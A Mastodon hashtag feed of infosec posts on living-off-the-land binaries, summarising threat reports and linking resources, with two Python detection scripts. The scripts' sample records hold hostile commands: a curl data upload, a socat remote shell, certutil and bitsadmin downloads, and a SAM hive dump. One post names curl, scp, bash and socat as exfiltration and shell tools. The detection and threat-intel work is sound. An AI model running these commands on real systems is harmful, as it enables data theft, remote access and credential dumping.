#LoLBins

2025-06-16

No PE header? No problem.

@FortiGuardLabs dropped a deep dive into a malware sample dumped without a PE header — like a cybercriminal rage-quit halfway through packing their payload.

You ever load a binary in IDA and think, “Am I being punk’d?”
Yeah, it’s one of those samples.

This sample:

  • Reconstructs its own PE structure at runtime

  • Hides config data in obfuscated blobs

  • Uses anti-sandbox tricks to avoid analysis

  • Drops yet another info-stealer, because originality is dead

It’s engineered to break basic static analysis and dodge sandboxes like it’s speedrunning DEFCON CTF.

🔗 Full breakdown:
fortinet.com/blog/threat-resea

TL;DR for blue teamers:

  • Static AV signatures won’t help here

  • Watch for suspicious memory allocations + hollowing patterns

  • Endpoint heuristics > file-based detection

  • Log your PowerShell and LOLBins — this thing probably brings friends

  • If your EDR cries when it sees raw shellcode, maybe give it a hug

#ThreatIntel #MalwareAnalysis #ReverseEngineering #Infosec #PEFilesAreSo2020 #EDREvasion #LOLbins #CyberSecurity #BlueTeam

On Linux systems, some of the most dangerous hacking tools are already preinstalled. Bash, curl, netcat, awk, even less — these common binaries can be chained together for stealthy attacks. They are called Linux LOLBins, short for Living Off the Land Binaries. Rather than dropping new malware, an attacker can leverage what is already there to stay undetected. Need to exfiltrate data? Use curl or scp. Want a reverse shell? Try bash or socat. Fileless persistence, privilege escalation, lateral movement — it can all happen through trusted tools.

Security is not just about locking the doors. It is about knowing which ones are left wide open by default.

#LinuxSecurity #LOLBins #LivingOffTheLand #RedTeamTips #CommandLineWarfare
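The post above lists the Linux binaries that get repurposed (curl and scp for exfiltration, bash and socat for shells) but not what the defender does with that list. The following is an added example, not code from the post: a small rule set run over constructed process-execution records in a key=value format loosely modelled on auditd execve data. The field names (uid, pcomm for the parent process name, comm, argv), the ".corp.internal" suffix used to decide what counts as an internal host, and every sample record are assumptions.

```python
"""Flag common Linux LOLBin abuse patterns in process-execution records.

Added example; not code from the original post. The record format is a
constructed key=value line loosely modelled on auditd execve data
(uid, pcomm = parent process name, comm, argv); the field names, the
".corp.internal" allowlist suffix and the sample records are assumptions.
"""
import re
import shlex
from dataclasses import dataclass

# Constructed sample records; not real telemetry.
SAMPLE_RECORDS = [
    'uid=1000 pcomm=bash comm=curl argv="curl -s https://example.com/index.html"',
    'uid=33 pcomm=apache2 comm=curl argv="curl -T /var/www/db.sqlite http://203.0.113.5/up"',
    'uid=33 pcomm=php-fpm comm=bash argv="bash -i"',
    'uid=33 pcomm=sh comm=socat argv="socat tcp:203.0.113.5:4444 exec:/bin/sh"',
    'uid=1000 pcomm=sshd comm=scp argv="scp report.pdf user@fileserver.corp.internal:/share/"',
    'uid=0 pcomm=cron comm=awk argv="awk -F: {print $1} /etc/passwd"',
]

RECORD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}
SHELLS = {"bash", "sh", "dash", "zsh"}
# curl/wget options that send local data somewhere instead of fetching it
UPLOAD_FLAGS = {"-T", "--upload-file", "-d", "-F", "--form", "--post-file", "--post-data"}
INTERNAL_SUFFIX = ".corp.internal"  # assumed: any other host counts as external


@dataclass
class Finding:
    rule: str
    comm: str
    argv: str


def parse_record(line):
    """Turn one key=value record into a dict, unquoting quoted values."""
    fields = {}
    for key, raw in RECORD_RE.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def scp_destination_host(args):
    """Return the host part of the first host:path operand, or None."""
    for arg in args[1:]:
        if ":" in arg and not arg.startswith("-"):
            return arg.split(":", 1)[0].rsplit("@", 1)[-1]
    return None


def evaluate(rec):
    """Apply the LOLBin rules to one parsed record and return the findings."""
    comm, argv = rec.get("comm", ""), rec.get("argv", "")
    args = shlex.split(argv)
    findings = []
    # Exfil through the download tools: an upload option turns curl/wget into a sender.
    if comm in {"curl", "wget"} and any(
        a in UPLOAD_FLAGS or a.startswith("--data") for a in args
    ):
        findings.append(Finding("curl_upload", comm, argv))
    # scp whose destination lies outside the assumed internal namespace.
    if comm == "scp":
        host = scp_destination_host(args)
        if host and not host.endswith(INTERNAL_SUFFIX):
            findings.append(Finding("scp_external", comm, argv))
    # socat wiring a socket to a program is the shell-over-network pattern.
    if comm == "socat" and any(a.lower().startswith(("exec:", "system:")) for a in args):
        findings.append(Finding("socat_exec", comm, argv))
    # A web-server worker has no business spawning a shell.
    if comm in SHELLS and rec.get("pcomm") in WEB_PARENTS:
        findings.append(Finding("webserver_shell", comm, argv))
    return findings


def scan(lines):
    """Evaluate every record and return all findings in input order."""
    findings = []
    for line in lines:
        findings.extend(evaluate(parse_record(line)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"{f.rule:16} {f.comm:6} {f.argv}")
```

Run against the sample records, only the upload, the shell spawned under php-fpm and the socat exec line are flagged; the plain curl fetch, the scp to an internal file server and the cron awk job pass. The parent-process rule is the cheapest of the four and usually the highest-signal one: the binaries are trusted, so the context they run in is what has to carry the detection.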

DeadSwitch @ T0m's 1T C4fe (TomsITCafe)
2025-05-06

They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.

tomsitcafe.com/2025/05/06/livi

Dan :dumpster_fire: (4n68r@infosec.exchange)
2025-01-28

Was looking for a good Awesome list on Living Off the Land ( #LOL #LOtL ) tools/techniques. Found some helpful sites / repos but either nothing I could contribute to or it was limited.

So... I made one: github.com/danzek/awesome-lol-

Contributions welcome, whether by replying to this post or sending a PR on GitHub.

#lolbins #lolbas

Steve Dustcircle 🌹 (dustcircle@masto.ai)
2024-12-14
2024-10-22

An awesome overview of all the LOL and GTFO stuff. Even if some are well known, it's a good overview.

github.com/sheimo/awesome-lolb

#redteam #lolbin #gtfo #securityressource #lolbins #blueteam #detectionengineering

2023-12-01

Did you know that the finger command can be used for data exfil? We recently had an incident where this type of activity was found

huntress.com/blog/cant-touch-t

#DFIR #lolbins #lolbas #exfil #mchammer #CTI #cybersecurity
@keydet89

🛡 H3lium@infosec.exchange/:~# :blinking_cursor: (H3liumb0y@infosec.exchange)
2023-10-17

"🍎 macOS Malware 2023: Navigating the New Threat Landscape 🌐"

Apple's XProtect recently updated to version 2173, introducing rules for Atomic Stealer and Adload. However, 2023 has unveiled novel methods to compromise Macs, leaving users vulnerable unless additional protective measures are taken. Key insights:

  1. Shift in Malware Behavior: Many macOS malware families in 2023 have ditched persistence. Infostealers, for instance, achieve their goals in a single execution, stealing user data and then transmitting it to a remote server. 📥🔓

  2. Sophisticated Social Engineering: Threat actors are employing advanced social engineering tactics. RustBucket malware, for example, lured victims with a business deal, urging them to download a 'proprietary' PDF viewer, which in reality was malware. 🎣📄

  3. Public Offensive Security Tools: Tools like Geacon, which wraps Cobalt Strike capabilities, are now being seen in macOS malware. Open-source red teaming tools like Mythic and Poseidon have also been spotted in recent campaigns. 🛠️🔥

  4. LOLBins Techniques: "Living off the orchard" techniques are on the rise in macOS. Built-in tools like system_profiler, sw_vers, and curl are being exploited for malicious purposes. 🌳🔧

  5. Abusing Open Source Software: JokerSpy malware, discovered in July 2023, began its infection through a trojanized QR code generator, QRLog. This malware was found in enterprise breaches, including a major cryptocurrency exchange. 🔄💼

  6. Complex Multi-Stage Malware: The Smooth Operator campaign, a sophisticated supply chain attack, compromised businesses via 3CX's call routing software client. The malware was designed for stealth, gathering limited data and then self-deleting. 📞🕵️

While Apple is enhancing its malware detection capabilities, third-party solutions are still crucial for comprehensive protection against both common and advanced threats. SentinelOne offers a robust platform for macOS threat detection and remediation. 🛡️💻

Source: SentinelOne

Tags: #macOS #Malware #CyberSecurity #XProtect #Infostealers #SocialEngineering #OffensiveSecurity #LOLBins #OpenSource #SentinelOne 🌐🔒🖥️

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2023-09-12

The Symantec research team uncovered an espionage campaign from the #APT group they track as #Redfly. The group used multiple tools during the campaign which included the #ShadowPad trojan, #Packerloader, and a key logger. They also abused some #LOLBINs to achieve their goals.

Redfly masqueraded ShadowPad in a "VMware" directory and gained persistence by creating a service that ran the malware once the computer started, and the keylogger stored its captured keystrokes in a directory that included "Intel" in the path. The APT group used reg.exe to dump credentials from the SYSTEM, SAM, and SECURITY hives. They also used a renamed version of ProcDump to dump credentials from LSASS. Powershell was also used to gather information on the storage devices attached to the system, and finally a scheduled task was created to perform side-loading and lateral movement. #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

2023-09-05

#APT28 resurfaces to set eyes on the Ukrainian power industry sector. #CERTUA warns defenders of a new #phishing attack abusing Microsoft Edge downloader, #TOR, #Mockbin, and #LOLBins. Detect adversary activity with #Sigma rules from SOC Prime Platform.

socprime.com/blog/apt28-phishi

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2023-09-04

While most of us celebrate Labor Day let's all try to take a moment to remember those who don't get to spend time with their loved ones today, wherever they may be and whatever they may be doing!

I don't know how this report slid under my radar, but the ESET research team unveiled a "Marioesque" themed adversary, #MoustachedBouncer! They are a cyberespionage group that targets foreign embassies in Belarus with the use of their ISP-level access and their tools #NightClub and #Disco. Using their (assumed) unique level of access, they compromise their targets by redirecting them to a fake #Microsoft update site which loads JavaScript code and then leads to a zip file being downloaded. The team wasn't able to get the zip file, but they were still able to identify some TTPs and #LOLBINS abuse, such as creating a malicious scheduled task. I hope you enjoy and Happy Hunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #LaborDay

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2023-09-02

Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and the Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but also provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

Attack Chain (From source)
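The Redfly and Flax Typhoon posts above describe the same handful of Windows LOLBin behaviours from the defender's side: reg.exe exporting the SAM, SYSTEM and SECURITY hives, a renamed ProcDump reading LSASS, and certutil or bitsadmin pulling tooling down. The following is an added example, not code from either post or from Symantec or Microsoft: it runs those behaviours as rules over constructed process-creation events that use Sysmon-style field names (Image, OriginalFileName, CommandLine, ParentImage). The sample paths, command lines, the "procdump" OriginalFileName value and the regular expressions are all assumptions, not indicators taken from the reports.

```python
"""Flag LOLBin credential-dumping and download patterns in process-creation events.

Added example; not code from the posts above or from the vendors they cite.
Events are constructed dicts with Sysmon-style field names (Image,
OriginalFileName, CommandLine, ParentImage); the sample values, paths and
regular expressions are assumptions, not indicators from the reports.
"""
import ntpath
import re

# Constructed sample events; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg save hklm\sam C:\Users\Public\sam.hiv"},
    # A renamed dumping tool parked in an "Intel" path (argument syntax deliberately simplified).
    {"Image": r"C:\ProgramData\Intel\svc.exe", "OriginalFileName": "procdump",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"svc.exe lsass.exe C:\ProgramData\Intel\out.dmp"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.7/a.txt a.txt"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"reg query hkcu\software\example"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer job /download http://203.0.113.7/t.exe C:\Users\Public\t.exe"},
]

# reg.exe exporting the hives that hold credential material
HIVE_DUMP_RE = re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)

# Download capability of built-in tools, keyed by the image's file-name stem
DOWNLOAD_RES = {
    "certutil": re.compile(r"-urlcache|https?://", re.I),
    "bitsadmin": re.compile(r"/transfer|/addfile", re.I),
    "powershell": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
}


def stem(path):
    """Lower-case file name without directory or extension."""
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def evaluate(event):
    """Apply the rules to one event; returns a list of (rule, detail) tuples."""
    image = stem(event["Image"])
    original = stem(event.get("OriginalFileName", ""))
    cmd = event.get("CommandLine", "")
    findings = []
    # The PE version resource names the tool even when the file on disk was renamed.
    if original and original != image:
        findings.append(("renamed_binary", f"{image} carries OriginalFileName {original}"))
    # Any ProcDump build pointed at LSASS is a credential-dumping attempt.
    if original == "procdump" and re.search(r"\blsass\b", cmd, re.I):
        findings.append(("lsass_dump", cmd))
    # Offline hive export through the built-in registry tool.
    if image == "reg" and HIVE_DUMP_RE.search(cmd):
        findings.append(("reg_hive_dump", cmd))
    # Built-in tools used as downloaders.
    pattern = DOWNLOAD_RES.get(image)
    if pattern and pattern.search(cmd):
        findings.append(("lolbin_download", cmd))
    return findings


def scan(events):
    """Evaluate every event and return all findings in input order."""
    findings = []
    for event in events:
        findings.extend(evaluate(event))
    return findings


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"{rule:16} {detail}")
```

The renamed-binary rule is the one worth keeping even if the others are tuned away: comparing the on-disk name with OriginalFileName catches the Redfly-style ProcDump rename without needing to know the tool's arguments, and it fires here before the LSASS rule does. The reg query event is in the fixture to show that the hive rule keys on "save" of the three credential hives only, not on every reg.exe execution.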
blueninja :verified: (blueninja@infosec.exchange)
2023-05-30

If you are familiar with #lolbins then this definitely will be interesting for you
#LOLDrivers is the list of Windows drivers used by adversaries to bypass security mechanisms. Great resource to develop new detections in your environment
loldrivers.io/
#infosec #dfir #threathunting #blueteam

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2023-05-08

#HappyMonday everyone! This #readoftheday is a BEAST and a good way to start the week! The researchers at ThreatMon conducted a deep dive into #APT41 activity and provide technical details of a custom-built backdoor that leverages #PowerShell. Enjoy and Happy Hunting!

APT41's Attack Chain: Exe-LolBins Leads to Powershell Backdoor with Telegram C2
cybersecuritynews.com/wp-conte

Notable MITRE ATT&CK TTPs:
TA0005 - Defense Evasion
T1202 - Indirect Command Execution
T1112 - Modify Registry

TA0003 - Persistence
T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)

TA0002 - Execution
T1059.001 - Command And Scripting Interpreter: Powershell
T1047 - Windows Management Instrumentation

TA0011 - Command And Control
T1071 - Application Layer Protocol

TA0007 - Discovery
T1016 - System Network Configuration Discovery

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #LOLBINS

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2023-04-28

Shout out to the Malwarebytes Labs team for this #readoftheday! I am a huge fan of anything Living-off-the-land binaries (#LOLBINS), and this article provides a great description of what they are and how #filelessattacks compare and contrast. Enjoy and Happy Hunting!

Fileless attacks: How attackers evade traditional AV and how to stop them
malwarebytes.com/blog/business

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

PowerShell script extracted from a Microsoft Word document. If macros are enabled, it would execute the code in memory upon being opened.
2023-04-18

On Episode 2 of our technical #livestream series #WhatTheVuln, Lindsay Von Tish discussed a technique for bypassing #EDR via #LoLBins. In this blog post, she goes into detail about the technique including how she initially discovered it.

Give it a read today!
bfx.social/3Gn3Fmw #infosec

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2023-04-10

Happy Monday everyone! Today's #readoftheday focuses on a recently discovered ransomware strain that exhibits some behaviors that have allowed it to fly under the radar of researchers. #BabLock, also known as #Rorschach by Check Point Software Technologies Ltd, exploits CVEs and some living-off-the-land binaries (#LOLBINs) to accomplish its goals. Check out the article by Group-IB for the rest of the details! Happy Hunting!

The old way: BabLock, new ransomware quietly cruising around Europe, Middle East, and Asia
group-ib.com/blog/bablock-rans

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting

2023-03-23

Now that you’ve seen #WhatTheVuln Episode 2 featuring Lindsay Von Tish and Allan Cecil, check out the corresponding technical write-up where you can take a deep dive into how to use #LoLBins to bypass #EDR protection and install a #C2 agent for advanced #postexploitation control.

And don’t fret if you missed the initial livestream – you can watch the recording on demand! bfx.social/3K4T1mS


P.S. Episode 3 is on the way!

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst